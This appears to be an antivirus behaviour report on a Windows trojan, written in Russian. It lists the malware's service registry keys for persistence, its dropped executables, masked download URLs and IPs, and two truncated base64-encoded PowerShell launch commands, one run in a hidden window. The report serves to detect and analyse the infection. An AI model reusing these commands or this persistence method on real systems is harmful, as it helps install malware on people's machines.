Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\secproc_ssp_isv] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\secproc_ssp_isv] 'ImagePath' = '"%WINDIR%\SysWOW64\mciseq\secproc_ssp_isv.exe"'
- 'secproc_ssp_isv' "%WINDIR%\SysWOW64\mciseq\secproc_ssp_isv.exe"
- 'secproc_ssp_isv' %WINDIR%\SysWOW64\mciseq\secproc_ssp_isv.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB5AGkAeQBzAGEAbwBxAHUAdABoAGEAcgBzAG8AZQBxAHUAagBpAG8AYwBoAD0AJwBkAGEAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIASQB0AHkAUABgAFIATwBgAF...
- %HOMEPATH%\466.exe
- %WINDIR%\syswow64\mciseq\secproc_ssp_isv.exe
- %HOMEPATH%\466.exe в %WINDIR%\syswow64\mciseq\secproc_ssp_isv.exe
- '12#.#5.106.173':443
- http://go##sz.com/wp-content/wbhJWVHG/
- http://12#.##.106.173:443/qNg3IlQ8Ee4kme/ via 12#.#5.106.173
- DNS ASK go##sz.com
- '%HOMEPATH%\466.exe'
- '%WINDIR%\syswow64\mciseq\secproc_ssp_isv.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB5AGkAeQBzAGEAbwBxAHUAdABoAGEAcgBzAG8AZQBxAHUAagBpAG8AYwBoAD0AJwBkAGEAegAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIASQB0AHkAUABgAFIATwBgAF...' (со скрытым окном)